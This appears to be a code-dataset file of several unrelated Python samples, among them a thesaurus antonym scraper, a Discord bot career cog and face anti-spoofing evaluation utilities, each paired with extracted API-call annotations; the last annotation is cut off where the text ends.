logger.info(f'Thesaurus.com had no antonym reference for the word {self._word}')
except bs4.FeatureNotFound as error:
logger.error('An error occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except AttributeError as error:
logger.error('An AttributeError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except IndexError as error:
logger.error('An IndexError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except KeyError as error:
logger.error('A KeyError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except TypeError as error:
logger.error('A TypeError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
def _query_wordhippo(self):
"""
This function queries wordhippo.com for antonyms associated
with the specific word provided to the Class Antonyms.
:returns:
antonyms: list of antonyms
:rtype: list
:raises
AttributeError: Raised when an attribute reference or assignment fails.
IndexError: Raised when a sequence subscript is out of range
KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.
TypeError: Raised when an operation or function is applied to an object of inappropriate type.
bs4.FeatureNotFound: raised by the BeautifulSoup constructor if no parser with the requested features
is found
"""
try:
antonyms = []
if self._proxies is None:
response = Query(f'https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html').get_single_page_html()
if response.status_code == 404:
logger.info(f'Wordhippo.com had no antonym reference for the word {self._word}')
else:
soup = BeautifulSoup(response.text, "lxml")
pattern = regex.compile(r'We do not currently know of any antonyms for')
if soup.find(text=pattern):
logger.info(f'Wordhippo.com had no antonym reference for the word {self._word}')
else:
related_tag = soup.find("div", {'class': 'relatedwords'})
for list_item in related_tag.find_all("div", {'class': 'wb'}):
for link in list_item.find_all('a', href=True):
antonyms.append(link.text)
antonyms = sorted([x.lower() for x in antonyms])
self._update_cache(antonyms)
return antonyms
elif self._proxies is not None:
response = Query(
f'https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html',
self._proxies).get_single_page_html()
if response.status_code == 404:
logger.info(f'Wordhippo.com had no antonym reference for the word {self._word}')
else:
soup = BeautifulSoup(response.text, "lxml")
pattern = regex.compile(r'We do not currently know of any antonyms for')
if soup.find(text=pattern):
logger.info(f'Wordhippo.com had no antonym reference for the word {self._word}')
else:
related_tag = soup.find("div", {'class': 'relatedwords'})
for list_item in related_tag.find_all("div", {'class': 'wb'}):
for link in list_item.find_all('a', href=True):
antonyms.append(link.text)
antonyms = sorted([x.lower() for x in antonyms])
self._update_cache(antonyms)
return antonyms
except bs4.FeatureNotFound as error:
logger.error('An error occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except AttributeError as error:
logger.error('An AttributeError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except IndexError as error:
logger.error('An IndexError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except KeyError as error:
logger.error('A KeyError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
except TypeError as error:
logger.error('A TypeError occurred in the following code segment:')
logger.error(''.join(traceback.format_tb(error.__traceback__)))
|
[
"wordhoard.utilities.basic_soup.Query",
"ratelimit.limits",
"wordhoard.utilities.caching.cache_antonyms",
"traceback.format_tb",
"backoff.on_exception",
"wordhoard.utilities.cleansing.flatten_multidimensional_list",
"wordhoard.utilities.caching.insert_word_cache_antonyms",
"bs4.BeautifulSoup",
"wordhoard.utilities.word_verification.validate_word_syntax",
"logging.getLogger",
"re.compile"
] |
[((1623, 1650), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1640, 1650), False, 'import logging\n'), ((3090, 3180), 'backoff.on_exception', 'on_exception', (['expo', 'RateLimitException'], {'max_time': '(60)', 'on_backoff': 'self._backoff_handler'}), '(expo, RateLimitException, max_time=60, on_backoff=self.\n _backoff_handler)\n', (3102, 3180), False, 'from backoff import on_exception, expo\n'), ((3278, 3348), 'ratelimit.limits', 'limits', ([], {'calls': 'max_number_of_requests', 'period': 'rate_limit_timeout_period'}), '(calls=max_number_of_requests, period=rate_limit_timeout_period)\n', (3284, 3348), False, 'from ratelimit import limits, RateLimitException\n'), ((4225, 4275), 'wordhoard.utilities.word_verification.validate_word_syntax', 'word_verification.validate_word_syntax', (['self._word'], {}), '(self._word)\n', (4263, 4275), False, 'from wordhoard.utilities import caching, cleansing, word_verification\n'), ((4564, 4598), 'wordhoard.utilities.caching.cache_antonyms', 'caching.cache_antonyms', (['self._word'], {}), '(self._word)\n', (4586, 4598), False, 'from wordhoard.utilities import caching, cleansing, word_verification\n'), ((4674, 4730), 'wordhoard.utilities.caching.insert_word_cache_antonyms', 'caching.insert_word_cache_antonyms', (['self._word', 'antonyms'], {}), '(self._word, antonyms)\n', (4708, 4730), False, 'from wordhoard.utilities import caching, cleansing, word_verification\n'), ((5551, 5600), 'wordhoard.utilities.cleansing.flatten_multidimensional_list', 'cleansing.flatten_multidimensional_list', (['antonyms'], {}), '(antonyms)\n', (5590, 5600), False, 'from wordhoard.utilities import caching, cleansing, word_verification\n'), ((7711, 7747), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""lxml"""'], {}), "(response.text, 'lxml')\n", (7724, 7747), False, 'from bs4 import BeautifulSoup\n'), ((11535, 11571), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""lxml"""'], {}), "(response.text, 'lxml')\n", (11548, 11571), False, 'from bs4 import BeautifulSoup\n'), ((11602, 11663), 're.compile', 'regex.compile', (['"""We do not currently know of any antonyms for"""'], {}), "('We do not currently know of any antonyms for')\n", (11615, 11663), True, 'import re as regex\n'), ((7434, 7489), 'wordhoard.utilities.basic_soup.Query', 'Query', (['f"""https://www.thesaurus.com/browse/{self._word}"""'], {}), "(f'https://www.thesaurus.com/browse/{self._word}')\n", (7439, 7489), False, 'from wordhoard.utilities.basic_soup import Query\n'), ((8720, 8756), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""lxml"""'], {}), "(response.text, 'lxml')\n", (8733, 8756), False, 'from bs4 import BeautifulSoup\n'), ((9522, 9562), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (9541, 9562), False, 'import traceback\n'), ((9724, 9764), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (9743, 9764), False, 'import traceback\n'), ((9918, 9958), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (9937, 9958), False, 'import traceback\n'), ((10107, 10147), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (10126, 10147), False, 'import traceback\n'), ((10298, 10338), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (10317, 10338), False, 'import traceback\n'), ((11236, 11313), 'wordhoard.utilities.basic_soup.Query', 'Query', (['f"""https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html"""'], {}), "(f'https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html')\n", (11241, 11313), False, 'from wordhoard.utilities.basic_soup import Query\n'), ((12740, 12776), 'bs4.BeautifulSoup', 'BeautifulSoup', (['response.text', '"""lxml"""'], {}), "(response.text, 'lxml')\n", (12753, 12776), False, 'from bs4 import BeautifulSoup\n'), ((12807, 12868), 're.compile', 'regex.compile', (['"""We do not currently know of any antonyms for"""'], {}), "('We do not currently know of any antonyms for')\n", (12820, 12868), True, 'import re as regex\n'), ((13674, 13714), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (13693, 13714), False, 'import traceback\n'), ((13876, 13916), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (13895, 13916), False, 'import traceback\n'), ((14070, 14110), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (14089, 14110), False, 'import traceback\n'), ((14259, 14299), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (14278, 14299), False, 'import traceback\n'), ((14450, 14490), 'traceback.format_tb', 'traceback.format_tb', (['error.__traceback__'], {}), '(error.__traceback__)\n', (14469, 14490), False, 'import traceback\n'), ((8428, 8498), 'wordhoard.utilities.basic_soup.Query', 'Query', (['f"""https://www.thesaurus.com/browse/{self._word}"""', 'self._proxies'], {}), "(f'https://www.thesaurus.com/browse/{self._word}', self._proxies)\n", (8433, 8498), False, 'from wordhoard.utilities.basic_soup import Query\n'), ((12385, 12481), 'wordhoard.utilities.basic_soup.Query', 'Query', (['f"""https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html"""', 'self._proxies'], {}), "(f'https://www.wordhippo.com/what-is/the-opposite-of/{self._word}.html',\n self._proxies)\n", (12390, 12481), False, 'from wordhoard.utilities.basic_soup import Query\n')]
|
from os import path
import glob
from data.sr import base
class SR291(base.SRBase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def get_path(self) -> str:
return path.join(self.dpath, 'SR291')
|
[
"os.path.join"
] |
[((217, 247), 'os.path.join', 'path.join', (['self.dpath', '"""SR291"""'], {}), "(self.dpath, 'SR291')\n", (226, 247), False, 'from os import path\n')]
|
import os
from cryptol import CryptolConnection, CryptolContext, cry
import cryptol
import cryptol.cryptoltypes
from BitVector import *
dir_path = os.path.dirname(os.path.realpath(__file__))
c = cryptol.connect("cabal new-exec --verbose=0 cryptol-remote-api")
c.change_directory(dir_path)
c.load_file("Foo.cry")
x_val = c.evaluate_expression("x").result()
assert c.evaluate_expression("Id::id x").result() == x_val
assert c.call('Id::id', bytes.fromhex('ff')).result() == bytes.fromhex('ff')
assert c.call('add', b'\0', b'\1').result() == b'\x01'
assert c.call('add', bytes.fromhex('ff'), bytes.fromhex('03')).result() == bytes.fromhex('02')
cryptol.add_cryptol_module('Foo', c)
from Foo import *
assert add(b'\2', 2) == b'\4'
assert add(BitVector( intVal = 0, size = 8 ), BitVector( intVal = 1, size = 8 )) == bytes.fromhex('01')
assert add(BitVector( intVal = 1, size = 8 ), BitVector( intVal = 2, size = 8 )) == bytes.fromhex('03')
assert add(BitVector( intVal = 255, size = 8 ), BitVector( intVal = 1, size = 8 )) == bytes.fromhex('00')
|
[
"cryptol.connect",
"cryptol.add_cryptol_module",
"os.path.realpath"
] |
[((198, 262), 'cryptol.connect', 'cryptol.connect', (['"""cabal new-exec --verbose=0 cryptol-remote-api"""'], {}), "('cabal new-exec --verbose=0 cryptol-remote-api')\n", (213, 262), False, 'import cryptol\n'), ((652, 688), 'cryptol.add_cryptol_module', 'cryptol.add_cryptol_module', (['"""Foo"""', 'c'], {}), "('Foo', c)\n", (678, 688), False, 'import cryptol\n'), ((165, 191), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (181, 191), False, 'import os\n')]
|
from asyncpg import Connection
from discord import Embed, User
from discord.utils import utcnow
from discord.ext import commands
from bot import GrowContext, GrowTube, MessagedError
from growconomy.constants import currency_name, embed_color, currency_emoji
from growconomy.views import ConfirmView
class Career(commands.Cog):
def __init__(self, bot: GrowTube) -> None:
self.bot = bot
async def cog_check(self, ctx: GrowContext):
data = await self.bot.pool.fetchval(
"SELECT 1 FROM users WHERE id = $1", ctx.author.id
)
if data is None:
raise MessagedError("You're not registered")
return True
@commands.group(invoke_without_command=True)
async def career(self, ctx: GrowContext):
await ctx.send_help(ctx.command)
@career.command(name="list")
async def _list(self, ctx: GrowContext):
careers = await self.bot.pool.fetch(
"SELECT careers.id, careers.name, COUNT(positions.id) AS positions FROM careers JOIN positions ON careers.id = positions.career GROUP BY careers.id"
)
embed = Embed(
title="List of careers",
description="\n".join(
f"**{i[1]}** with **{i[2]}** positions, id: {i[0]}" for i in careers
),
color=embed_color,
)
return await ctx.reply(embed=embed)
@career.command()
async def info(self, ctx: GrowContext, user: User = None):
user = user or ctx.author
c_name, pos_name, pos_pay = (
await self.bot.pool.fetchrow(
"SELECT careers.name, positions.name, positions.pay FROM users JOIN careers ON careers.id = users.career JOIN positions ON positions.id = users.position WHERE users.id = $1",
ctx.author.id,
)
) or [None, None, None]
if c_name is None:
raise MessagedError(
f"{f'`{user.display_name}`' if user != ctx.author else 'You'} seems to be unemployed"
)
await ctx.send(
embed=Embed(
timestamp=utcnow(),
color=embed_color,
)
.set_author(name=user.display_name, icon_url=user.display_avatar)
.add_field(name="Job name", value=c_name)
.add_field(name="Position", value=pos_name)
.add_field(
name=f"Wage", value=f"{pos_pay:,} {currency_name} {currency_emoji}"
)
)
@career.command()
async def change(self, ctx: GrowContext, career_id: int):
async with self.bot.pool.acquire() as conn:
oc_name, op_id, op_pay = (
await conn.fetchrow(
"SELECT careers.name, positions.name, positions.pay FROM users JOIN positions ON positions.id = users.position JOIN careers ON careers.id = users.career WHERE users.id = $1",
ctx.author.id,
)
) or [None, None, None]
conn: Connection
if career_id == 0:
if oc_name is None:
return await ctx.reply("You're already unemployed dummy")
view = ConfirmView(ctx, timeout=60, delete_after=None)
await view.prompt("Are you sure you want to quit your job?")
if not view.result:
return await view.message.reply("aborting")
await self.bot.pool.execute(
"UPDATE users SET career = NULL, position = NULL WHERE id = $1",
ctx.author.id,
)
return await ctx.send(
"Congratulations, you're now unemployed. Have fun eating pizza 24/7"
)
pos_id, pos_name, c_name, pos_pay = (
await conn.fetchrow(
"SELECT positions.id, positions.name, careers.name, positions.pay FROM positions JOIN careers ON careers.id = positions.career WHERE privilege = (SELECT MAX(privilege) FROM positions) AND careers.id = $1 ORDER BY RANDOM() LIMIT 1",
career_id,
)
) or [None, None, None, None]
if pos_id is None:
raise MessagedError("Invalid career id")
view = ConfirmView(ctx, timeout=60, delete_after=None)
if oc_name:
text = (
"Are you sure you want to repick your job?\n"
f"You're currently working as a **{oc_name}**, with **{op_id}** position and with a pay of **{op_pay:,} {currency_name}**\n"
f"Changing to **{c_name}**, with **{pos_name}** positions and a pay of **{pos_pay:,} {currency_name}** {currency_emoji}"
)
else:
text = f"Are you sure you want to be a **{c_name}** as **{pos_name}** with a pay of **{pos_pay:,} {currency_name}** {currency_emoji} (You can change career anytime)"
await view.prompt(text)
if not view.result:
return await view.message.reply("aborting")
await self.bot.pool.execute(
"UPDATE users SET career = $1, position = $2 WHERE id = $3",
career_id,
pos_id,
ctx.author.id,
)
await ctx.send(f"Changed your career to **{c_name}** as a **{pos_name}**")
|
[
"discord.utils.utcnow",
"growconomy.views.ConfirmView",
"bot.MessagedError",
"discord.ext.commands.group"
] |
[((675, 718), 'discord.ext.commands.group', 'commands.group', ([], {'invoke_without_command': '(True)'}), '(invoke_without_command=True)\n', (689, 718), False, 'from discord.ext import commands\n'), ((610, 648), 'bot.MessagedError', 'MessagedError', (['"""You\'re not registered"""'], {}), '("You\'re not registered")\n', (623, 648), False, 'from bot import GrowContext, GrowTube, MessagedError\n'), ((1894, 2004), 'bot.MessagedError', 'MessagedError', (['f"""{f\'`{user.display_name}`\' if user != ctx.author else \'You\'} seems to be unemployed"""'], {}), '(\n f"{f\'`{user.display_name}`\' if user != ctx.author else \'You\'} seems to be unemployed"\n )\n', (1907, 2004), False, 'from bot import GrowContext, GrowTube, MessagedError\n'), ((4266, 4313), 'growconomy.views.ConfirmView', 'ConfirmView', (['ctx'], {'timeout': '(60)', 'delete_after': 'None'}), '(ctx, timeout=60, delete_after=None)\n', (4277, 4313), False, 'from growconomy.views import ConfirmView\n'), ((3173, 3220), 'growconomy.views.ConfirmView', 'ConfirmView', (['ctx'], {'timeout': '(60)', 'delete_after': 'None'}), '(ctx, timeout=60, delete_after=None)\n', (3184, 3220), False, 'from growconomy.views import ConfirmView\n'), ((4211, 4245), 'bot.MessagedError', 'MessagedError', (['"""Invalid career id"""'], {}), "('Invalid career id')\n", (4224, 4245), False, 'from bot import GrowContext, GrowTube, MessagedError\n'), ((2100, 2108), 'discord.utils.utcnow', 'utcnow', ([], {}), '()\n', (2106, 2108), False, 'from discord.utils import utcnow\n')]
|
'''
Code of 'Searching Central Difference Convolutional Networks for Face Anti-Spoofing'
By <NAME> & <NAME>, 2019
If you use the code, please cite:
@inproceedings{yu2020searching,
title={Searching Central Difference Convolutional Networks for Face Anti-Spoofing},
author={<NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME> and <NAME>},
booktitle= {CVPR},
year = {2020}
}
Only for research purpose, and commercial use is not allowed.
MIT License
Copyright (c) 2020
'''
import os
import numpy as np
import torch
import shutil
import torchvision.transforms as transforms
from torch.autograd import Variable
import sklearn
from sklearn import metrics
from sklearn.metrics import roc_curve, auc
import pdb
def get_file_list(read_path):
'''
获取文件夹下图片的地址
:param read_path:
:return:
'''
path = read_path
dirs = os.listdir(path)
floder_len = len(dirs)
file_name_list = []
for i in range(floder_len):
# 设置路径
floder = dirs[i]
floder_path = path + "/" + floder
# 如果路径下是文件,那么就再次读取
if os.path.isdir(floder_path):
file_one = os.listdir(floder_path)
file_len_one = len(file_one)
for j in range(file_len_one):
# 读取视频
floder_path_one = floder_path + "/" + file_one[j]
if os.path.isdir(floder_path_one):
file_two = os.listdir(floder_path_one)
file_len_two = len(file_two)
for k in range(file_len_two):
floder_path_two = floder_path_one + "/" + file_two[k]
if os.path.isdir(floder_path_two):
file_three = os.listdir(floder_path_two)
file_len_three = len(file_three)
for m in range(file_len_three):
floder_path_three = floder_path_two + "/" + file_three[m]
file_name_list.append(floder_path_three)
else:
file_name_list.append(floder_path_two)
else:
file_name_list.append(floder_path_one)
# 如果路径下,没有文件夹,直接是文件,就加入进来
else:
file_name_list.append(floder_path)
return file_name_list
class AvgrageMeter(object):
def __init__(self):
self.reset()
def reset(self):
self.avg = 0
self.sum = 0
self.cnt = 0
def update(self, val, n=1):
self.sum += val * n
self.cnt += n
self.avg = self.sum / self.cnt
def accuracy(output, target, topk=(1,)):
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def get_threshold(score_file):
with open(score_file, 'r') as file:
lines = file.readlines()
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
angle = float(tokens[0])
# pdb.set_trace()
type = int(tokens[1])
data.append({'map_score': angle, 'label': type})
if type == 1:
num_real += 1
else:
num_fake += 1
min_error = count # account ACER (or ACC)
min_threshold = 0.0
min_ACC = 0.0
min_ACER = 0.0
min_APCER = 0.0
min_BPCER = 0.0
for d in data:
threshold = d['map_score']
type1 = len([s for s in data if s['map_score'] <= threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > threshold and s['label'] == 0])
ACC = 1 - (type1 + type2) / count
APCER = type2 / num_fake
BPCER = type1 / num_real
ACER = (APCER + BPCER) / 2.0
if ACER < min_error:
min_error = ACER
min_threshold = threshold
min_ACC = ACC
min_ACER = ACER
min_APCER = APCER
min_BPCER = min_BPCER
# print(min_error, min_threshold)
return min_threshold, min_ACC, min_APCER, min_BPCER, min_ACER
def test_threshold_based(threshold, score_file):
with open(score_file, 'r') as file:
lines = file.readlines()
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
angle = float(tokens[0])
type = int(tokens[1])
data.append({'map_score': angle, 'label': type})
if type == 1:
num_real += 1
else:
num_fake += 1
type1 = len([s for s in data if s['map_score'] <= threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > threshold and s['label'] == 0])
ACC = 1 - (type1 + type2) / count
APCER = type2 / num_fake
BPCER = type1 / num_real
ACER = (APCER + BPCER) / 2.0
return ACC, APCER, BPCER, ACER
def get_err_threhold(fpr, tpr, threshold):
RightIndex = (tpr + (1 - fpr) - 1);
right_index = np.argmax(RightIndex)
best_th = threshold[right_index]
err = fpr[right_index]
differ_tpr_fpr_1 = tpr + fpr - 1.0
right_index = np.argmin(np.abs(differ_tpr_fpr_1))
best_th = threshold[right_index]
err = fpr[right_index]
# print(err, best_th)
return err, best_th
# def performances(dev_scores, dev_labels, test_scores, test_labels):
def performances(map_score_test_filename):
val_threshold = 0.4
# test
with open(map_score_test_filename, 'r') as file2:
lines = file2.readlines()
test_scores = []
test_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = tokens[0]
score = score[:-1]
score = score[1:]
score = float(score)
label = tokens[1]
label = label[:-1]
label = label[1:]
label = int(label)
test_scores.append(score)
test_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
# test based on val_threshold
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
test_ACC = 1 - (type1 + type2) / count
test_APCER = type2 / num_fake
test_BPCER = type1 / num_real
test_ACER = (test_APCER + test_BPCER) / 2.0
# test based on test_threshold
fpr_test, tpr_test, threshold_test = roc_curve(test_labels, test_scores, pos_label=1)
err_test, best_test_threshold = get_err_threhold(fpr_test, tpr_test, threshold_test)
type1 = len([s for s in data if s['map_score'] <= best_test_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > best_test_threshold and s['label'] == 0])
test_threshold_ACC = 1 - (type1 + type2) / count
test_threshold_APCER = type2 / num_fake
test_threshold_BPCER = type1 / num_real
test_threshold_ACER = (test_threshold_APCER + test_threshold_BPCER) / 2.0
return test_ACC, test_APCER, test_BPCER, test_ACER, test_threshold_ACER
def performances_SiW_EER(map_score_val_filename):
# val
with open(map_score_val_filename, 'r') as file:
lines = file.readlines()
val_scores = []
val_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = float(tokens[0])
label = int(tokens[1])
val_scores.append(score)
val_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
fpr, tpr, threshold = roc_curve(val_labels, val_scores, pos_label=1)
val_err, val_threshold = get_err_threhold(fpr, tpr, threshold)
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
val_ACC = 1 - (type1 + type2) / count
val_APCER = type2 / num_fake
val_BPCER = type1 / num_real
val_ACER = (val_APCER + val_BPCER) / 2.0
return val_threshold, val_ACC, val_APCER, val_BPCER, val_ACER
def performances_SiWM_EER(map_score_val_filename):
# val
with open(map_score_val_filename, 'r') as file:
lines = file.readlines()
val_scores = []
val_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = float(tokens[0])
label = int(tokens[1])
val_scores.append(score)
val_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
fpr, tpr, threshold = roc_curve(val_labels, val_scores, pos_label=1)
val_err, val_threshold = get_err_threhold(fpr, tpr, threshold)
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
val_ACC = 1 - (type1 + type2) / count
val_APCER = type2 / num_fake
val_BPCER = type1 / num_real
val_ACER = (val_APCER + val_BPCER) / 2.0
return val_threshold, val_err, val_ACC, val_APCER, val_BPCER, val_ACER
def get_err_threhold_CASIA_Replay(fpr, tpr, threshold):
RightIndex = (tpr + (1 - fpr) - 1);
right_index = np.argmax(RightIndex)
best_th = threshold[right_index]
err = fpr[right_index]
differ_tpr_fpr_1 = tpr + fpr - 1.0
right_index = np.argmin(np.abs(differ_tpr_fpr_1))
best_th = threshold[right_index]
err = fpr[right_index]
# print(err, best_th)
return err, best_th, right_index
def performances_CASIA_Replay(map_score_val_filename):
# val
with open(map_score_val_filename, 'r') as file:
lines = file.readlines()
val_scores = []
val_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = tokens[0]
score = score[:-1]
score = score[1:]
score = float(score)
label = tokens[1]
label = label[:-1]
label = label[1:]
label = int(label)
val_scores.append(score)
val_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
fpr, tpr, threshold = roc_curve(val_labels, val_scores, pos_label=1)
val_err, val_threshold, right_index = get_err_threhold_CASIA_Replay(fpr, tpr, threshold)
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
val_ACC = 1 - (type1 + type2) / count
FRR = 1 - tpr # FRR = 1 - TPR
HTER = (fpr + FRR) / 2.0 # error recognition rate & reject recognition rate
return val_ACC, fpr[right_index], FRR[right_index], HTER[right_index]
def performances_ZeroShot(map_score_val_filename):
# val
with open(map_score_val_filename, 'r') as file:
lines = file.readlines()
val_scores = []
val_labels = []
data = []
count = 0.0
num_real = 0.0
num_fake = 0.0
for line in lines:
count += 1
tokens = line.split()
score = float(tokens[0])
label = int(tokens[1])
val_scores.append(score)
val_labels.append(label)
data.append({'map_score': score, 'label': label})
if label == 1:
num_real += 1
else:
num_fake += 1
fpr, tpr, threshold = roc_curve(val_labels, val_scores, pos_label=1)
auc_val = metrics.auc(fpr, tpr)
val_err, val_threshold, right_index = get_err_threhold_CASIA_Replay(fpr, tpr, threshold)
type1 = len([s for s in data if s['map_score'] <= val_threshold and s['label'] == 1])
type2 = len([s for s in data if s['map_score'] > val_threshold and s['label'] == 0])
val_ACC = 1 - (type1 + type2) / count
FRR = 1 - tpr # FRR = 1 - TPR
HTER = (fpr + FRR) / 2.0 # error recognition rate & reject recognition rate
return val_ACC, auc_val, HTER[right_index]
def count_parameters_in_MB(model):
return np.sum(np.prod(v.size()) for name, v in model.named_parameters() if "auxiliary" not in name) / 1e6
def save_checkpoint(state, is_best, save):
filename = os.path.join(save, 'checkpoint.pth.tar')
torch.save(state, filename)
if is_best:
best_filename = os.path.join(save, 'model_best.pth.tar')
shutil.copyfile(filename, best_filename)
def save(model, model_path):
torch.save(model.state_dict(), model_path)
def load(model, model_path):
model.load_state_dict(torch.load(model_path))
def drop_path(x, drop_prob):
if drop_prob > 0.:
keep_prob = 1. - drop_prob
mask = Variable(torch.cuda.FloatTensor(x.size(0), 1, 1, 1, 1).bernoulli_(keep_prob))
x.div_(keep_prob)
x.mul_(mask)
return x
def create_exp_dir(path, scripts_to_save=None):
if not os.path.exists(path):
os.mkdir(path)
print('Experiment dir : {}'.format(path))
if scripts_to_save is not None:
os.mkdir(os.path.join(path, 'scripts'))
for script in scripts_to_save:
dst_file = os.path.join(path, 'scripts', os.path.basename(script))
shutil.copyfile(script, dst_file)
|
[
"os.mkdir",
"numpy.abs",
"sklearn.metrics.roc_curve",
"numpy.argmax",
"os.path.isdir",
"os.path.basename",
"torch.load",
"os.path.exists",
"torch.save",
"sklearn.metrics.auc",
"shutil.copyfile",
"os.path.join",
"os.listdir"
] |
[((876, 892), 'os.listdir', 'os.listdir', (['path'], {}), '(path)\n', (886, 892), False, 'import os\n'), ((5255, 5276), 'numpy.argmax', 'np.argmax', (['RightIndex'], {}), '(RightIndex)\n', (5264, 5276), True, 'import numpy as np\n'), ((6862, 6910), 'sklearn.metrics.roc_curve', 'roc_curve', (['test_labels', 'test_scores'], {'pos_label': '(1)'}), '(test_labels, test_scores, pos_label=1)\n', (6871, 6910), False, 'from sklearn.metrics import roc_curve, auc\n'), ((8120, 8166), 'sklearn.metrics.roc_curve', 'roc_curve', (['val_labels', 'val_scores'], {'pos_label': '(1)'}), '(val_labels, val_scores, pos_label=1)\n', (8129, 8166), False, 'from sklearn.metrics import roc_curve, auc\n'), ((9267, 9313), 'sklearn.metrics.roc_curve', 'roc_curve', (['val_labels', 'val_scores'], {'pos_label': '(1)'}), '(val_labels, val_scores, pos_label=1)\n', (9276, 9313), False, 'from sklearn.metrics import roc_curve, auc\n'), ((9907, 9928), 'numpy.argmax', 'np.argmax', (['RightIndex'], {}), '(RightIndex)\n', (9916, 9928), True, 'import numpy as np\n'), ((11002, 11048), 'sklearn.metrics.roc_curve', 'roc_curve', (['val_labels', 'val_scores'], {'pos_label': '(1)'}), '(val_labels, val_scores, pos_label=1)\n', (11011, 11048), False, 'from sklearn.metrics import roc_curve, auc\n'), ((12191, 12237), 'sklearn.metrics.roc_curve', 'roc_curve', (['val_labels', 'val_scores'], {'pos_label': '(1)'}), '(val_labels, val_scores, pos_label=1)\n', (12200, 12237), False, 'from sklearn.metrics import roc_curve, auc\n'), ((12252, 12273), 'sklearn.metrics.auc', 'metrics.auc', (['fpr', 'tpr'], {}), '(fpr, tpr)\n', (12263, 12273), False, 'from sklearn import metrics\n'), ((12965, 13005), 'os.path.join', 'os.path.join', (['save', '"""checkpoint.pth.tar"""'], {}), "(save, 'checkpoint.pth.tar')\n", (12977, 13005), False, 'import os\n'), ((13010, 13037), 'torch.save', 'torch.save', (['state', 'filename'], {}), '(state, filename)\n', (13020, 13037), False, 'import torch\n'), ((1098, 1124), 'os.path.isdir', 'os.path.isdir', (['floder_path'], {}), '(floder_path)\n', (1111, 1124), False, 'import os\n'), ((5410, 5434), 'numpy.abs', 'np.abs', (['differ_tpr_fpr_1'], {}), '(differ_tpr_fpr_1)\n', (5416, 5434), True, 'import numpy as np\n'), ((10062, 10086), 'numpy.abs', 'np.abs', (['differ_tpr_fpr_1'], {}), '(differ_tpr_fpr_1)\n', (10068, 10086), True, 'import numpy as np\n'), ((13078, 13118), 'os.path.join', 'os.path.join', (['save', '"""model_best.pth.tar"""'], {}), "(save, 'model_best.pth.tar')\n", (13090, 13118), False, 'import os\n'), ((13127, 13167), 